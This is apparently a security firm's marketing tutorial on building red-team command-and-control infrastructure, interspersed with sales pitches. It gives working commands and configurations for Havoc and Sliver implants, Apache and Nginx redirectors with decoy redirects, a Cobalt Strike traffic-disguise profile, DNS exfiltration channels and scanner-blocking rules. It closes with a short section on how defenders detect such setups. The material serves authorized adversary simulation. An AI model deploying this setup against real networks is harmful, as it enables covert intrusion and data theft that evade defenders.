Command and Control (C2) infrastructure is the backbone of any sophisticated red team engagement or adversary simulation. Whether you are emulating advanced persistent threats (APTs) for a client or stress-testing your organization's detection capabilities, knowing how to architect, deploy, and harden a C2 infrastructure is a non-negotiable skill for modern penetration testers.
This guide walks you through the entire C2 build process: from selecting your framework to hardening your infrastructure against blue team detection. We have included real commands, configuration snippets, and operational security (OPSEC) practices used in professional red team engagements.
If your organization needs a full-scale red team assessment with professionally managed C2 infrastructure, Redfox Cybersecurity's penetration testing services deliver exactly that, simulating real-world threat actor TTPs at every layer.
Command and Control infrastructure refers to the servers, communication channels, and supporting systems that an attacker (or red teamer) uses to maintain persistent access to compromised hosts, issue commands, and exfiltrate data.
In a red team context, C2 infrastructure typically includes:
Understanding this architecture is critical for both offensive operators building simulated attack environments and defenders who need to detect and dismantle such systems.
Selecting a C2 framework depends on the scope, objectives, and maturity of the target environment. The most widely used frameworks in professional red team engagements include:
Cobalt Strike remains the industry standard for mature red team operations. It offers a Malleable C2 profile system that lets operators reshape Beacon's network traffic to mimic legitimate applications.
Havoc is a modern, open-source C2 framework written in Go and C. It is increasingly preferred for engagements where a commercial license is not available or where novel evasion is required.
To get Havoc up and running on a Debian-based server:
# Clone the repository
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc
# Install dependencies
sudo apt install -y git build-essential apt-utils cmake libfontconfig1 libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev qtdeclarative5-dev golang-go nasm mingw-w64 python3-dev
# Build the teamserver
cd teamserver && go mod download && go build . -o teamserver && cd ..
# Build the client
cd client && mkdir build && cd build
cmake .. && make -j4
[cta]
Sliver is a highly capable open-source C2 developed by Bishop Fox. It supports multiple protocols including HTTP/S, DNS, mTLS, and WireGuard.
# Install Sliver on Linux
curl https://sliver.sh/install | sudo bash
# Start the Sliver server
sliver-server
# Generate an HTTPS implant
sliver > generate --http your-redirector-domain.com --save /tmp/implant.exe
[cta]
One of the most important OPSEC practices in C2 infrastructure design is never exposing your teamserver directly to the internet. Redirectors act as proxies that forward traffic from implants to your backend server while shielding the true C2 IP from network defenders and threat intelligence platforms.
Apache with mod_rewrite is a classic redirector setup. It allows fine-grained control over which requests get forwarded and which get dropped or served decoy content.
# Install Apache
sudo apt install -y apache2
# Enable required modules
sudo a2enmod rewrite proxy proxy_http headers ssl
# Edit your VirtualHost config
sudo nano /etc/apache2/sites-available/000-default.conf
[cta]
Add the following rewrite rules to your VirtualHost block:
<VirtualHost *:443>
ServerName your-legitimate-looking-domain.com
SSLEngine on
SSLCertificateFile /etc/letsencrypt/live/your-domain/fullchain.pem
SSLCertificateKeyFile /etc/letsencrypt/live/your-domain/privkey.pem
RewriteEngine On
# Only forward requests matching your implant's URI profile
RewriteCond %{REQUEST_URI} ^/api/v2/update [NC]
RewriteRule ^(.*)$ https://TEAMSERVER_IP:443%{REQUEST_URI} [P,L]
# Serve a decoy page for all other requests
RewriteRule ^(.*)$ https://www.microsoft.com/ [R=302,L]
</VirtualHost>
[cta]
This configuration ensures that only traffic with the correct URI pattern gets forwarded to your teamserver. Everything else is redirected to a benign site, making passive inspection far less revealing.
Nginx is a leaner alternative for redirector setups, especially in cloud environments:
server {
listen 443 ssl;
server_name your-domain.com;
ssl_certificate /etc/letsencrypt/live/your-domain/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/your-domain/privkey.pem;
location /api/v2/update {
proxy_pass https://TEAMSERVER_IP;
proxy_set_header Host $host;
proxy_set_header X-Forwarded-For $remote_addr;
}
location / {
return 302 https://www.amazon.com/;
}
}
[cta]
Need this kind of sophisticated infrastructure architected and operated for your next engagement? Redfox Cybersecurity's red team services cover full C2 deployment, redirector hardening, and adversary simulation from start to finish.
A C2 domain needs to be believable. Defenders using web proxy categorization tools will immediately flag an uncategorized or newly registered domain. The goal is to use domains that are:
# Check domain WHOIS info
whois your-target-domain.com
# Query VirusTotal for domain reputation
curl -s "https://www.virustotal.com/api/v3/domains/your-domain.com" \
-H "x-apikey: YOUR_VT_API_KEY" | python3 -m json.tool
# Check Bluecoat/Symantec categorization
curl "https://sitereview.bluecoat.com/v/api/lookup" \
-d "url=https://your-domain.com"
[cta]
Every C2 domain must have a valid SSL certificate. Use Let's Encrypt for fast, free certificate issuance:
# Install Certbot
sudo apt install certbot python3-certbot-apache -y
# Obtain a certificate
sudo certbot --apache -d your-domain.com
# Verify auto-renewal
sudo certbot renew --dry-run
[cta]
Default C2 traffic is highly detectable. Beacon, for example, has well-documented default IOCs (indicators of compromise) that any mature SOC will catch. Malleable C2 profiles allow you to reshape how Beacon traffic looks on the wire.
set sleeptime "5000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36";
http-get {
set uri "/api/v2/update/check";
client {
header "Accept" "application/json, text/javascript, */*; q=0.01";
header "Accept-Language" "en-US,en;q=0.9";
header "X-Requested-With" "XMLHttpRequest";
metadata {
base64url;
prepend "session_token=";
header "Cookie";
}
}
server {
header "Content-Type" "application/json";
header "Cache-Control" "no-cache, no-store";
output {
base64url;
prepend "{\"status\":\"ok\",\"data\":\"";
append "\"}";
print;
}
}
}
[cta]
This profile makes Beacon's HTTP GET requests resemble AJAX calls to a web application, blending in with normal enterprise traffic.
DNS C2 is an excellent fallback channel for environments with strict HTTP/S egress filtering. DNS queries are rarely blocked entirely, making them ideal for low-and-slow exfiltration or backup communication.
# In Sliver, generate a DNS implant
sliver > generate --dns c2.your-domain.com --save /tmp/dns_implant.exe
# Configure your DNS C2 listener
sliver > dns --domains c2.your-domain.com
# On your DNS server, configure NS records
# your-domain.com NS records should point to your teamserver IP
# c2.your-domain.com NS records:
# c2 IN NS ns1.your-domain.com
# ns1 IN A TEAMSERVER_IP
[cta]
DNS C2 is slower than HTTP/S but far more resilient in locked-down environments. Exfiltration of a 1 MB file over DNS typically takes 10 to 20 minutes depending on query intervals, but it will evade most perimeter controls.
Building infrastructure is only half the battle. Protecting your teamserver identity is equally critical, especially in long-running engagements where blue teams are actively hunting.
Lock down your teamserver to only accept connections from your redirectors:
# Allow only redirector IPs to reach C2 ports
sudo ufw default deny incoming
sudo ufw allow from REDIRECTOR_IP to any port 443
sudo ufw allow from REDIRECTOR_IP to any port 80
sudo ufw allow from YOUR_VPN_IP to any port 50050 # Cobalt Strike GUI
sudo ufw enable
[cta]
# Block common scanning user-agents at the redirector level (Nginx example)
if ($http_user_agent ~* "(masscan|nmap|zgrab|shodan|censys|python-requests)") {
return 444;
}
[cta]
# Disable password auth
sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication no/' /etc/ssh/sshd_config
# Restrict SSH to known operator IPs only
sudo ufw allow from YOUR_IP to any port 22
# Restart SSH
sudo systemctl restart sshd
[cta]
Never run a C2 server indefinitely on the same IP. Rotate your redirectors every 7 to 14 days in active engagements. Automate this with Terraform or Ansible so you can spin up a new redirector and decommission the old one in minutes.
# Example: Terraform to deploy a DigitalOcean redirector
terraform init
terraform apply -var="redirector_region=nyc3" -var="teamserver_ip=TEAMSERVER_IP"
[cta]
If you want this level of OPSEC-hardened C2 infrastructure built and operated for your organization's red team engagement, the specialists at Redfox Cybersecurity handle it all, from architecture through debrief.
Understanding how defenders can detect your infrastructure makes you a better red teamer. Key detection methods include:
TLS client fingerprinting can identify specific C2 frameworks regardless of the domain or certificate used. Tools like Zeek or Suricata can extract JA3 hashes in real time.
# Extract JA3 fingerprints from a PCAP
python3 ja3.py --json capture.pcap | python3 -m json.tool
[cta]
Defenders use Shodan and Censys to identify known C2 server signatures. Common Cobalt Strike default configurations, for example, expose characteristic HTTP response headers that are searchable.
# Shodan CLI search for Cobalt Strike default TLS certs
shodan search 'ssl.cert.subject.cn:"Major Cobalt Strike"'
# Censys query for Havoc default server banner
censys search 'services.http.response.headers.server="Havoc"'
[cta]
Running your own infrastructure through these searches before an engagement is a sanity check every red teamer should perform.
Here is a minimal but operationally sound C2 stack suitable for a professional red team engagement:
Component 1: TeamserverHosted on a VPS with no public-facing ports except SSH from operator IPs. Runs Sliver or Havoc. Firewall allows only redirector IPs on C2 ports.
Component 2: HTTPS RedirectorAn Apache or Nginx server with a valid SSL certificate on a categorized, aged domain. Forwards implant traffic to teamserver. Serves decoy content to all other requests.
Component 3: DNS RedirectorA secondary redirector configured to handle DNS-based callbacks as a backup channel. Uses a separate subdomain with properly configured NS records pointing to the teamserver.
Component 4: Payload Staging ServerA separate, short-lived server used only to stage initial payloads. Decommissioned after the initial access phase.
This architecture ensures that if one component is burned, the rest of the operation can continue with minimal disruption.
Building production-grade Command and Control infrastructure is a discipline that sits at the intersection of network engineering, operational security, and offensive tradecraft. Every layer of your infrastructure, from domain selection to firewall rules, contributes to whether your operation stays undetected long enough to achieve its objectives.
The commands and configurations in this guide reflect practices used in real professional red team engagements. Treat every detail, a missing firewall rule, a default TLS fingerprint, an uncategorized domain, as a potential indicator that can get your infrastructure burned within hours in a mature environment.
For organizations that need the full breadth of this expertise applied to their security posture, Redfox Cybersecurity offers comprehensive penetration testing and red team services that include custom C2 infrastructure, adversary simulation, and actionable remediation reporting. From internal network assessments to full-scope red team operations, the team at Redfox Cybersecurity brings the depth of knowledge covered in this guide to every engagement.
Get in touch with Redfox Cybersecurity to scope your next red team engagement and find out how your defenses hold up against a real-world threat actor simulation.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
